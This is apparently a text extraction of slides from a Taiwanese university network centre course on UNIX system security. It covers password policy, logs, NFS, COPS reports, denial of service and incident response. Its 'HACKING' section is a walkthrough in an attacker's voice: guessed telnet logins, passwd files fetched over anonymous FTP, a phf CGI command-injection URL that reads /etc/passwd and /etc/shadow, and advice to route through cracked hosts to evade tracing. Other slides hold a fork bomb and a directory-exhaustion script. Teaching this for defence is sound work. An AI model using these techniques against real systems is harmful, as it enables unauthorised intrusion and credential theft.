云嘉區(qū)網(wǎng)中心研習(xí)課程課件

1、雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程系統(tǒng)安全管理國(guó)立中正大學(xué)電算中心張永榴chang.tw1系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程PART I. UNIX Security BasicsPART II. Enforcing Security on your SystemPART III. Handling Security Incidents2系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程PART I. UNIX Security Basics1. Introduction2. Users and Passwords3. The UNIX Filesystem3系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程A computer is secu

2、re if you can depend on it and its software to behave as you expect it to.The three parts of UNIX: The kernel Standard utility programs System database filesIntroduction4系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Users and Passwords:The crypt AlgorithmPassword Salt Encrypted Password- - -nutmeg Mi MiqkFWCm1fNJIellen1 ri ri79K

3、Nd7V6.SkSharon ./ ./2aN7ysff3qMnorahs am amfIADT2iqjAfnorahs 7a 7azfT5tIdyh0I/etc/passwd filesroot:fi3sED95ibqR6:0:1:System Operator:/:/bin/cshdaemon:*:1:1:/tmpuucp:ooRoMN9FyZNE:4:4:/usr/spool/uucpublic:/usr/lib/uucp/uucicorachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/csharlin:f8fk3jlOrf3

4、4:182:100:Arlin Steinberg:/u/arlin:/bin/csh6系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Bad Passwords: login name, anybodys name, birth date phone number, a place, all the same letter, word in the English dictionary, all numbers, less than 6 letters,.Adminstrative Techniques assign passwords to users crack your own passwords s

5、hadow password files password aging and expirationSummary ensure every account has a password ensure every user choose a strong password use shadow password file, if available7系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程1. Defending Your Accounts2. Securing Your Data3. The UNIX Log Files4. Modems5. Networks and Security6. NFS7

6、. COPS8. Patch Installation9. FirewallPart II. Enforcing Security on Your System9系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Defending Your Accounts Dangerous Accounts accounts without passwords defaults accounts accounts that run a single command open accounts Protecting the root Accounts secure terminals the wheel group 10系統(tǒng)

7、安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Securing Your DataFile backups 1. Why back up? user error, system staff error, hardware error, software error, electronic break-ins, natural disaster 2. What should you back up? user files, system databases, any system directories 3. How long back up?Database daily checking /etc/passwd

8、, /etc/group, /etc/rc*, /etc/ttys, /etc/inittab, /usr/spool/cron/crontabs, /etc/aliases, /etc/exports, /etc/vfstab, /etc/netgroup11系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程The UNIX Log Files/usr/adm/lastlog/etc/utmp, /usr/adm/wtmp, /usr/adm/wtmpx/usr/adm/pacct/usr/adm/sulog12系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Modems1. Devices: /dev/modem, /de

9、v/ttys(0-9), /dev/ttyfa, /dev/ttyda, /dev/cua*2. Mode and owner: chmod 600 /dev/modem chown root /dev/modem3. Modems hang-up checking:13系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程N(yùn)etworks and SecurityTrusted ports 01023 /etc/services fileRlogin and rsh /etc/hosts.equiv /.rhosts “r” commands in /etc/inetd.conf file /.netrc Rem

10、ote print /etc/hosts.lpq14系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程N(yùn)etworks and Security Finger /etc/inetd.conf kill -1 pid_of_inetd Sendmail 1. debug, wiz, kill command 2. delete decode aliases from alias file. (decode:”|/usr/bin/uudecode”) 3. disable the “wizard” password in the sendmail.cf file. Example: #Let the wizard

11、do what she want OWsitrVlWxktZ6716系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程N(yùn)etworks and Security Anonymous FTP 1. create ftp account. 2. mkdir ftp/bin ftp/etc ftp/pub 3. cp /bin/ls ftp/bin 4. chmod 111 ftp/pub /ftp/etc ftp/bin ftp/bin/ls 5. cp /etc/passwd ftp/etc/passwd 6. cp /etc/group ftp/etc/group 7. chmod 444 ftp/etc/*

12、8. chown root ftp ftp/etc /ftp/bin 9. chown ftp.ftp ftp/pub 10. chmod 555 ftp17系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程N(yùn)FS /etc/exports File exportfs command showmount command19系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程COPS File, directory and device files permissions /etc/passwd and /etc/group files SUID files examples:20系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程ATTENTION:

13、Security Report for Wed Dec 18 13:30:30 CST 1991from host Warning! A “+” entry in /etc/hosts.equiv!Warning! “.” (or current directory) is in roots path!Warning! Directory /usr/spool/mail is _World_writable!Warning! File /etc/motd is _World_writable!Warning! File /etc/mntab is _World_writable!Warning

14、! File /etc/remote is _World_writable!Warning! File /etc/sm is _World_writable!Warning! File /etc/sm.bak is _World_writable!Warning! File /etc/state is _World_writable!Warning! File /etc/tmp is _World_writable!Warning! File /etc/utmp is _World_writable!Warning! User uucps home directory /var/spool/u

15、ucpublic is mode 03777Warning! Password file, line 2, negative user id: nobody:*:-2:-2:/:Warning! Password file, line 11, no password: sync:1:1:/:/bin/syncWarning! Password file, line 12, user sysdiag has uid = 0 and is not root sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag: /usr/diag/sysdiag/sy

16、sdiag21系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Patch Installation .twexample:22系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Denial of Service Attacks and Solutions一、Destruction Attacks:1. Reformating a disk partition=Prevent anyone from acessing the machine in single-user mode. Protect the superuser account.2. Deleting critical files:=Protect system f

17、iles by specifying approicate modes (eg., 755 or 711). Protect the superuser account.3. turn off power=Put the computer in a physically location.23系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Denial of Service Attacks and Solutions二、Overload Attacks1.Process Overload Attacks:example. main() while (1) fork(); = Solaris: /etc/sys

18、tem set maxproc=1002.System Overload:= set your own priority as high as you can with the renice command24系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Denial of Service Attacks and Solutions四、Tree Structure Attacks:example:#!/bin/kshwhile mkdir_anotherdo cd ./another cp /bin/cc fillitupdone= DIY= shell script= delete the inode o

19、f the top directory # boot -s # ls -i another # df another # /usr/sbin/clri /dev/dsk/c0t2d0s2 1491 # fsck /dev/dsk/c0t2d0s226系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程PART III. Handling Security Incidents系統(tǒng)入侵檢測(cè)：1. 檢查連線記錄檔中是否有不尋常的來(lái) 源或操作動(dòng)作。2. 找出系統(tǒng)中所有setuid及setgid檔案3. 檢查系統(tǒng)執(zhí)行檔是否被修改，如login, su, telnet, netstat, ifconfig, ls, find

20、, du, df sync, 任何在/etc/inetd.conf中記載的 程式。4. 檢查系統(tǒng)中是否有正在執(zhí)行網(wǎng)路監(jiān)聽(tīng) 程式。5. 檢查所有由cron和at所執(zhí)行的程式。27系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程PART III. Handling Security Incidents從log files發(fā)現(xiàn)入侵者蹤跡. 使用者在奇怪的時(shí)間內(nèi)進(jìn)入 last. 系統(tǒng)不明原因的重新啟動(dòng) w, last. 系統(tǒng)時(shí)間不明原因改變 time. 來(lái)自sendmail, ftp等不尋常的錯(cuò)誤 訊息 /var/adm/syslog, xferlog. 未經(jīng)授權(quán)或可疑的 su 指令使用 /usr/adm/sulog

21、. 使用者來(lái)自陌生站臺(tái) who, last29系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程PART III. Handling Security Incidents發(fā)現(xiàn)入侵事件一、確認(rèn)並瞭解問(wèn)題二、阻止損害三、確定您的診斷並決定損害四、恢復(fù)系統(tǒng)五、處理根本原因六、執(zhí)行相關(guān)復(fù)原工作30系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING進(jìn)入主機(jī)有好幾種方式, 可以經(jīng)由Telnet (Port 23) 或SendMail (Port 25)或FTP或WWW (Port 80) 的方式進(jìn)入, 一臺(tái)主機(jī)雖然只有一個(gè)位址,但是它可能同時(shí)進(jìn)行多項(xiàng)服務(wù),所以如果你只是要進(jìn)入該主機(jī), 這些Port都是很好的進(jìn)行方向.示範(fàn)進(jìn)入主

22、機(jī)的方法: (By CoolFire)(首先要先連上某一臺(tái)你已經(jīng)有帳號(hào)的 Telnet 主機(jī), 當(dāng)然最好是假的, 也就是 Crack過(guò)的主機(jī), 然後利用它來(lái)Crack 別的主機(jī),才不會(huì)被別人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from (我用的是, 當(dāng)然是假的囉, 都已經(jīng)經(jīng)過(guò)修改了啦!沒(méi)有這一臺(tái)主機(jī)啦 ! 別怕 ! 別怕!以下的主機(jī)名稱都是假的名稱! 31系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程Digital UNIX V1.2C (Rev. 248); Mon

23、 Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯.進(jìn)來(lái)了!開(kāi)始攻擊吧!本次的目標(biāo)是.) telnet (Telnet 試試看.)Trying 55.Connected to .Escape character is .Password:Login incorrect(沒(méi)關(guān)係, 再來(lái) !)cool login: hinetPassword:Login incorrect(都沒(méi)猜對(duì),這邊用的是猜的方法, 今天運(yùn)

24、氣好像不好)HACKING (Continued)32系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程(重來(lái), 換個(gè)Port試試看!) telnet 55 80Trying 55.Connected to 55.Escape character is .ErrorError 400Invalid request (unknown method) CERN-HTTPD 3.0AConnection closed by foreign host.(哇哩!連密碼都沒(méi)得輸入,真是.再來(lái)!要有恆心!)(換FTP Port試試)HACKING (Continued)33系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程 ftp 55Con

25、nected to 55.220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (55:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any230-unusual problems, please report

26、 them via e-mail to root230-If you do have problems, please try using a dash (-) as the first character230-of your password - this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binar

27、y mode to transfer files.(哇!可以用anonymous進(jìn)來(lái)耶!password部份輸入aaa就好了,不要留下足跡喔!)HACKING (Continued)34系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)ftp ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯. 太好了 ! 進(jìn)來(lái)了 ! 下一個(gè)目標(biāo)是.)ftp

28、cd etc250 CWD command successful.ftp get passwd (抓回來(lái) !)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔. 這麼容易嗎?)35系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)ftp !cat passwd (看看!)root:0:0:root

29、:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uuc

30、p:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1:/home/ftp:/bin/bash(哇哩.是Shadow 的.真是出師不利. )ftp bye221 Goodbye.36系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)(不信邪.還是老話, 要有恆心.)(FT

31、P 不行, 再Telnet看看!) telnet Trying 55.Connected to .Escape character is .Password:Login incorrect(又猜錯(cuò)!)cool login: hackmePassword:Last login: Mon Dec 2 09:20:07 from 2Linux 1.2.13.Some programming languages manage to absorb change but withstandprogress.cool:$ (哇哈! 哪個(gè)笨root用system name作username和password!

32、 總算沒(méi)白玩!)37系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)抓回來(lái)一個(gè)“亂七八糟”的/etc/passwd, 你以為我的真那麼笨嗎?guest所抓回來(lái)的能是甚麼好東西?所以繼續(xù)上次的攻擊行動(dòng). 我們已經(jīng)猜到了一個(gè)不是guest的username及password. 就以它來(lái)進(jìn)入主機(jī)瞧瞧 !Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 19

33、96Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯. 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標(biāo)是.) telnet (Telnet 試試看. )Trying 55.Connected to .Escape character is .cool login: hackmePassword: (一樣輸入hackme)38系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)Last login: Mon Dec 1 12:44:10 from

34、Linux 1.2.13.cool:$ cd /etccool:/etc$ ls pa*passwd passwd.OLD passwd.oldcool:/etc$ more passwd(看看有沒(méi)有Shadow.)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john:(正點(diǎn)!一點(diǎn)都沒(méi)有防備!)cool:/etc$ exitlogout(走人!. 換FTP上場(chǎng)!)Connection closed by foreign host.39系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)

35、課程HACKING (Continued) ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): hackme331 Password required for hackme.Password:230 User hackme logged in.Remote system type is UNIX.Using binary mode to transfer filesftp cd /etc250 CWD command successf

36、ul.ftp get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john:(看看! 呵!假不了!)

37、40系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)二、CGI Hole (phf.cgi).tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdQuery Results/usr/local/bin/ph -m alias=x /bin/cat /etc/passwdroot:x:0:0:0000-Admin(0000):/:/sbin/shdaemon:x:1:1:0000-admin(0000):/:bin:x:2:2:0000-admin(0000):/usr/bin:sys:x:3:3:0000-admin(0000)

38、:/:adm:x:4:4:0000-admin(0000):/var/adm:lp:x:71:8:0000-lp(0000):/usr/spool/lp:smtp:x:0:0:mail daemon user:/:uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:nobody:x:60001:60001:uid no body:/:hansin:x:109:1:/home1/hansin:/usr/lib/rshdayeh:x:110:1:/home1/dayeh:/usr/lib/rsh再試.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow41系統(tǒng)安全管理雲(yún)嘉區(qū)網(wǎng)中心研習(xí)課程HACKING (Continued)#1 FTP 入侵法? 不太實(shí)用的方法!1 連接到 FTP Server.2 當(dāng)系統(tǒng)要求你輸入U(xiǎn)ser Name時(shí)Enter不管它3 Password 輸入- quote user ftp4 接著再輸入- quote cwd root5 再輸入